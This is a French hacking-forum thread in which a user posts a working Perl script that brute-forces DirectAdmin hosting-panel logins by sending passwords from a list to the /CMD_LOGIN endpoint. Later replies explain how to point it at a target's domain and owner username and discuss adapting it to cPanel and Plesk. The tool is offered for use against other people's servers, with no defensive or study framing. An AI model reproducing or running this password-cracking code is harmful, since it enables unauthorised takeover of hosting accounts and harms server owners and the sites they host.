Annonce

Réduire
Aucune annonce.

[Perl] Direct Admin BruteForce Tool

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • [Perl] Direct Admin BruteForce Tool

    Voici un petit tool permetant de cracker des login directadmin via une passlist

    Pour info , DirectAdmin est un Gestionaire de hosting comme un Cpanel , qui utilise le port 2222 par default .

    Petit screen dun panel DirectAdmin :



    Maintenant , voila le tool :

    Code:
    #!/usr/bin/perl     use LWP::UserAgent;     use HTTP::Request;  print q(  ========================================================  #         directadmin brute forcer perl (priv8)  ======================================================== ); my $host =  $ARGV[0]; my $port = $ARGV[1]; my $user = $ARGV[2]; my $list = $ARGV[3];  die " usage : perl $0 [host] [user][list] \n - \n Ex : perl $0  http://localhost/ 2222 direct pass.txt\n" unless $ARGV[3]; if($host !~  /http:\/\//) { $host = "http://$host"; } my $useragaint = new  LWP::UserAgent; open (PASSFILE, "<$list") || die "[-] Can't open the  List of password file !";  @LISTS = <PASSFILE>;  close  PASSFILE;  foreach my $L (@LISTS) {  chomp $L;  $pwd = $L;  my $response  = $useragaint->post($host.":".$port."/CMD_LOGIN", {  "username"    => "$user", "password"   => "$pwd", }); if ($content =  $response->content=~ /<h1>Invalid login. Please verify your  Username and Password<\/h1>/) { print "[-] password : $pwd Is  Incorrect . \n"; } else { print "\n\n[+] PASSWORD FOUND : $pwd\n";  exit() } }

  • #2
    toujours aussi bon
    sigpic

    Commentaire


    • #3
      Salut,

      j'arrive pas à l'exécuter...

      quand je copie colle le code et que je l'appelle par exemple BF_PWD.pl que je met un petit dico dans le même répertoire dénomme pass.txt et que je le lance :

      perl $0 http://localhost/ 2222 direct pass.txt

      >> Can't open perl script "sh": No such file or directory

      J'l'ai mis en .pl faut le mettre en .sh .. ????

      Enfin bref ça marche pas.
      sigpic

      Cyprium Download Link

      Plus j'étudie plus j'me rends compte que je n'sais rien.

      †|

      Commentaire


      • #4
        SAKAROV, dès que tu vois un script en perl, avec cette utilisation :

        perl xx

        Sa voudras dire que c'est a éxécuter via un shell, tu le lances via ton shell

        Note :

        Localhost > domain du target
        hostname > username du owner de notre target sur le server

        Et cela marche seulement sur des servers avec DirectAdmin installé

        PS : SAKAROV, je ne poste jamais des trucs qui ne marche pas
        Dernière modification par xConsoLe, 07 septembre 2011, 20h27.

        Commentaire


        • #5
          Oui bah je sais sais qu'il faut l'exécuter via un shell, merci Je sais aussi qu'il faut mettre "perl" en début de commande, je l'avais décrit dans mon post ci-dessus ahah !!

          En fait, ce que j'avais pas saisi... c'est que ça fonctionne QUE pour des Panel Admin "DirectAdmin"...

          Ca doit pouvoir être modifiable pour d'autres panels admin, qu'en dis-tu ?
          sigpic

          Cyprium Download Link

          Plus j'étudie plus j'me rends compte que je n'sais rien.

          †|

          Commentaire


          • #6
            Oui bien sûr, mais je ne suis pas un coder , en plus la plupart des servers utilisent la licence Cpanel, et pour ça j'ai ce qu'il faut

            Enfin bon, y'a 2 méthodes, que je vais share plus tard, et une qui restera privée sur mon PC

            Commentaire


            • #7
              Ahah !! Ok !

              Cpanel et plesk aussi si tu as...
              sigpic

              Cyprium Download Link

              Plus j'étudie plus j'me rends compte que je n'sais rien.

              †|

              Commentaire

              Chargement...
              X